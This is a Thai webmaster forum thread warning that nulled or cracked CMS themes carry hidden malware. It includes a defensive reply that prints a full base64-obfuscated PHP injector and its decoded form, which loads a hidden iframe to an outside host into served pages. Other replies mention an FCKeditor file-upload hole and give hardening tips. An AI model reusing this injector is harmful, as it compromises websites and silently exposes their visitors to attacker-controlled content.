reactionkz
ก๊วนเสียว
พลังน้ำใจ: 18
ออฟไลน์
กระทู้: 359
|
|
« ตอบ #20 เมื่อ: 08 ตุลาคม 2012, 21:02:59 » |
|
ขอบคุณคราบบที่มาเตือนแต่เหมือนจะโดนแล้ว
|
|
|
บันทึกการเข้า
|
|
|
|
system-4x
ก๊วนเสียว
พลังน้ำใจ: 16
ออฟไลน์
กระทู้: 259
|
|
« ตอบ #21 เมื่อ: 08 ตุลาคม 2012, 21:06:01 » |
|
นี่มัน shell ดีๆนี่เอง เหมือนกับได้เครื่องมาฟรีๆ
|
|
|
บันทึกการเข้า
|
|
|
|
seonew
ก๊วนเสียว
พลังน้ำใจ: 26
ออฟไลน์
กระทู้: 372
|
|
« ตอบ #22 เมื่อ: 08 ตุลาคม 2012, 21:12:20 » |
|
ฐานสแปมเมล์อย่างดีเลย เช็คดีๆ งานอาจงอกได้ ผมเลิกใช้ล่ะพวกธีม null ทั้งหลายแหล่ ไม่โดนแฮกก็โดนใช้ประโยชน์
|
|
|
บันทึกการเข้า
|
|
|
|
wasantec
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 586
ออฟไลน์
กระทู้: 2,613
|
|
« ตอบ #23 เมื่อ: 08 ตุลาคม 2012, 22:05:51 » |
|
ความรู้
|
|
|
บันทึกการเข้า
|
|
|
|
jengseo01
สมุนแก๊งเสียว
พลังน้ำใจ: 24
ออฟไลน์
กระทู้: 745
|
|
« ตอบ #24 เมื่อ: 08 ตุลาคม 2012, 22:14:14 » |
|
ขอบคุณครับ
|
|
|
บันทึกการเข้า
|
|
|
|
Juststarted
ก๊วนเสียว
พลังน้ำใจ: 89
ออฟไลน์
กระทู้: 402
|
|
« ตอบ #25 เมื่อ: 08 ตุลาคม 2012, 22:41:37 » |
|
ผมก็เจอครับ ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย
|
|
« แก้ไขครั้งสุดท้าย: 08 ตุลาคม 2012, 22:50:51 โดย Juststarted »
|
บันทึกการเข้า
|
|
|
|
iczykung
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 182
ออฟไลน์
กระทู้: 2,433
|
|
« ตอบ #26 เมื่อ: 09 ตุลาคม 2012, 12:43:13 » |
|
ผมก็เจอครับ ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย งานงอกเลยครับอิอิ สู้ๆ นะครับ
|
|
|
บันทึกการเข้า
|
|
|
|
hastyman
ก๊วนเสียว
พลังน้ำใจ: 13
ออฟไลน์
กระทู้: 252
|
|
« ตอบ #27 เมื่อ: 10 ตุลาคม 2012, 00:25:45 » |
|
**เตือนความปลอดภัย** สำหรับ CMS หรือ Theme ที่ผ่านการ Nulled หรือ cracked ผมเจอมาแล้วครับ มันจะฝัง script malware แถมมาให้เราด้วยครับ เช่น เวลาคลิ๊กเข้าเว็บเราผ่านทาง google search จะวิ่งไปเว็บมันซะงั้น สำหรับการแก้ปัญหาเบื้องต้น ง่ายๆ ครับ เปิด file php ทีล่ะไฟล์แล้ว search หา ส่วนใหญ่มันจะอยู่ในลักษณะนี้นะครับ <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gJzxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmV2YWwodW5lc2NhcGUoIiU2NCU2RiU2MyU3NSU2RCU2NSU2RSU3NCUyRSU3NyU3MiU2OSU3NCU2NSUyOCUyNyUzQyU2OSU2NiU3MiU2MSU2RCU2NSUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2MiU2OSU2MiU3QSU2RiU3MCU2QyUyRSU2MyU2RiU2RCUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
อะไรประมาณนี้ครับ มันจะฝังอยู่ บรรทัดแรกของไฟล์ PHP ทุกไฟล์ เมื่อผมทำการถอดรหัสแล้ว ปลาดุก.... แอร้ยยย ปรากฏว่าเจอแบบนี้ครับ if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){ $GLOBALS['mr_no']=1; if(!function_exists('mrobh')){ if(!function_exists('gml')){ function gml(){ if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){ return ''; } return ""; } } if(!function_exists('gzdecode')){ function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } } เพื่อนๆ คงจะเดาออกนะครับว่ามันคืออะไร น่ากลัวป่ะล่าาาาาาาาาาาาาา หรือเพื่อนๆ สามารถตรวจสอบ Malware ในเว็บได้ที่ วิธีตรวจสอบ Malware ในเว็บไซต์ ปล.เพิ่มตัวอย่าง Code จริงๆ ปล2.ขอบคุณสำหรับน้ำใจที่ทุกท่าน Thank ให้นะครับ แบบนี้ใครจะรู้บ้าง นอกจาก โปรแกรมเมอร์
|
|
|
บันทึกการเข้า
|
|
|
|
iczykung
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 182
ออฟไลน์
กระทู้: 2,433
|
|
« ตอบ #28 เมื่อ: 10 ตุลาคม 2012, 02:09:17 » |
|
ลองเข้าไปเช็คตามลิงค์ที่ผมให้ไปครับ จะรู้ว่าเว็บเราติดไหม
|
|
|
บันทึกการเข้า
|
|
|
|
solutioncom
Verified Seller
สมุนแก๊งเสียว
พลังน้ำใจ: 35
ออฟไลน์
กระทู้: 543
|
|
« ตอบ #29 เมื่อ: 10 ตุลาคม 2012, 10:57:22 » |
|
สำหรับ joomla ตัวที่โหลดมาใช้กัน มันไม่มี สคริปฝังติดมาครับ แต่สคริปจะถูกเขียนทับขึ้นมาใหม่ อันนี้ยังสรุปไม่ได้ว่าเกิดจากการเช็คของเจ้าของ template แล้วมาเขียนทับ หรือว่าโดนอย่างอื่น บางสคริปโดนเขียนทับใน libraries ก็มีแต่ก็หาไม่ยากเท่าไร ทางที่ดีแนะนำว่าตอนขึ้น host จริง ให้ทำการตั้งค่า permission ของโฟลเดอร์ต่างๆให้เรียบร้อย เวลาจะแก้ไขอะไรก็ค่อยไปเปิดเพื่อทำการแก้ไข แล้วก็ปิดให้เรียบร้อย รับรองว่าไม่ว่าจะเกิดจากอะไรก็ตาม ยังไงก็เขียนทับไฟล์ไม่ได้ นอกจากจะโดนขั้นเทพ
|
|
|
บันทึกการเข้า
|
|
|
|
flash
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 16
ออฟไลน์
กระทู้: 1,022
|
|
« ตอบ #30 เมื่อ: 10 ตุลาคม 2012, 11:38:55 » |
|
เข้ารหัสได้ยาวจริงๆ ครับ +1
|
|
|
บันทึกการเข้า
|
ครีมหมอจุฬา ผ่าน อย. อยากหน้าใส ไร้รอยด่างดำ ครีมหมอจุฬาซื้อที่ไหน หาไม่ยากเลย แต่ระวังของปลอมนะ ของเราเป็น ครีมหมอจุฬาของแท้ 100% มาดูสินค้าก่อนได้
|
|
|
Juststarted
ก๊วนเสียว
พลังน้ำใจ: 89
ออฟไลน์
กระทู้: 402
|
|
« ตอบ #31 เมื่อ: 10 ตุลาคม 2012, 18:39:50 » |
|
ผมก็เจอครับ ผมว่าจะเปลี่ยนใหม่ให้หมดเลย theme เนี้ย งานงอกเลยครับอิอิ สู้ๆ นะครับ ท่านพอจะมีแนวทางจัดการหน่อยมั้ย ผมพยายามแล้วมันปฎิเสธ
|
|
|
บันทึกการเข้า
|
|
|
|
iczykung
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 182
ออฟไลน์
กระทู้: 2,433
|
|
« ตอบ #32 เมื่อ: 10 ตุลาคม 2012, 18:57:43 » |
|
สำหรับ joomla ตัวที่โหลดมาใช้กัน มันไม่มี สคริปฝังติดมาครับ แต่สคริปจะถูกเขียนทับขึ้นมาใหม่ อันนี้ยังสรุปไม่ได้ว่าเกิดจากการเช็คของเจ้าของ template แล้วมาเขียนทับ หรือว่าโดนอย่างอื่น บางสคริปโดนเขียนทับใน libraries ก็มีแต่ก็หาไม่ยากเท่าไร ทางที่ดีแนะนำว่าตอนขึ้น host จริง ให้ทำการตั้งค่า permission ของโฟลเดอร์ต่างๆให้เรียบร้อย เวลาจะแก้ไขอะไรก็ค่อยไปเปิดเพื่อทำการแก้ไข แล้วก็ปิดให้เรียบร้อย รับรองว่าไม่ว่าจะเกิดจากอะไรก็ตาม ยังไงก็เขียนทับไฟล์ไม่ได้ นอกจากจะโดนขั้นเทพ สำหรับช่องโหว่ของ Joomla ตัวอย่างเว็บกระทรวงนะครับโดน hack จาก FCKeditor หรือตัวที่เราใช้โพสบทความนั่นแหละครับ มันมี function ที่ให้ user upload แล้ว hacker นำเอามาเปลี่ยน /path ไปreplace logo แทน ก็เลยจบข่าวเลยครับ นอกเหนือจากนี้ยังสามารถ upload php file ไปแทนของเก่าเราได้ด้วยครับเช่น configuration.php ทางที่ดีแนะนำว่าให้เปลี่ยน ไม่ก็ยกเลิก comment users ไปเลยครับ เอาไว้ admin อย่างเดียวก็พอปลอดภัยที่สุดครับ :wanwan011:ปล.ขอบคุณทุกท่านที่ Thank ให้นะครับ ยินดีให้คำปรึกษาครับ
|
|
« แก้ไขครั้งสุดท้าย: 10 ตุลาคม 2012, 18:58:32 โดย iczykung »
|
บันทึกการเข้า
|
|
|
|
kangtung
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 94
ออฟไลน์
กระทู้: 1,002
|
|
« ตอบ #33 เมื่อ: 11 ตุลาคม 2012, 09:17:03 » |
|
ขอโทษที โพสต์อีกกระทู้ทำไมมาโผล่ที่นี่ไม่รู้
|
|
« แก้ไขครั้งสุดท้าย: 11 ตุลาคม 2012, 09:18:46 โดย kangtung »
|
บันทึกการเข้า
|
|
|
|
iczykung
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 182
ออฟไลน์
กระทู้: 2,433
|
|
« ตอบ #34 เมื่อ: 25 ตุลาคม 2012, 00:36:24 » |
|
ใครเจออีกบ้างน้อ
|
|
|
บันทึกการเข้า
|
|
|
|
brucewayne
คนรักเสียว
พลังน้ำใจ: 24
ออฟไลน์
กระทู้: 157
|
|
« ตอบ #35 เมื่อ: 25 ตุลาคม 2012, 01:11:17 » |
|
ภัยใกล้ตัวครับ ดันๆๆ
|
|
|
บันทึกการเข้า
|
|
|
|
barbarian
คนรักเสียว
พลังน้ำใจ: 8
ออฟไลน์
กระทู้: 188
|
|
« ตอบ #36 เมื่อ: 02 ธันวาคม 2012, 17:05:36 » |
|
หัวอกเดียวกัน
เพิ่งจัดการได้ก่อนเข้ามาอ่านกระทู้นี้ นั่งงมตั้งนานนนนนนนนนน
FTP software ใช้ของที่มั่นใจได้นะครับ ไม่งั้นโดนแน่ๆๆๆๆๆ
|
|
|
บันทึกการเข้า
|
|
|
|
zankumuro
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 113
ออฟไลน์
กระทู้: 1,036
|
|
« ตอบ #37 เมื่อ: 02 ธันวาคม 2012, 17:13:02 » |
|
ของแถมๆ
|
|
|
บันทึกการเข้า
|
|
|
|
CMSHostThailand
บุคคลทั่วไป
|
|
« ตอบ #38 เมื่อ: 02 ธันวาคม 2012, 18:45:08 » |
|
ต้องตรวจสอบดีๆ ทางที่ดีซื้อธีมลิขสิทธิ์มาใช้ค่ะ ปลอดภัย อัพเดตได้ตลอด
|
|
|
บันทึกการเข้า
|
|
|
|
|